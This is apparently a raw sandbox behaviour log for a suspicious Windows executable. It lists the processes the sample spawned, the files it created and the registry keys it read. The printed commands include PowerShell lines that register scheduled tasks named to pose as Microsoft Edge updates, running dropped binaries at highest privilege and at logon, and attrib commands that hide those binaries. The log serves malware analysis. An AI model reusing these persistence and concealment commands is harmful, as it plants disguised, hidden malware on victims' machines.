Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322Jump to behavior
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: T1#U52a9#U624b1.0.1.exeVirustotal: Detection: 14%
Source: LineInst.exeString found in binary or memory: %s /InstallFile "%s"
Source: LineInst.exeString found in binary or memory: /Install %s
Source: LineInst.exeString found in binary or memory: /InstallFrom
Source: LineInst.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallFile
Source: SetupHost.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallDrivers
Source: SetupHost.exeString found in binary or memory: /InstallLangPacks
Source: SetupHost.exeString found in binary or memory: /InstallPrivates
Source: SetupHost.exeString found in binary or memory: /InstallFOD
Source: SetupHost.exeString found in binary or memory: /LaunchSetup
Source: SetupHost.exeString found in binary or memory: /LaunchSetupWithConfig
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile read: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe
Source: unknownProcess created: C:\Users\user\AppData\LineInst.exe C:\Users\user\AppData\Roaming\../LineInst.exe
Source: unknownProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\LineInst.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +s +a +h C:\Users\user\AppData\LineInst.exe&&attrib +s +a +h C:\Users\user\AppData\WinHex.exe&&attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\LineInst.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\WinHex.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +a +h C:\Users\user\AppData\SystemUpdate.exeJump to behavior
Source: C:\Users\user\AppData\LineInst.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe "C:\$Windows.~WS\Sources\SetupHost.Exe" /Download /Web Jump to behavior
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\WinHex.exe C:\Users\user\AppData\Roaming\../WinHex.exeJump to behavior
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\SystemUpdate.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
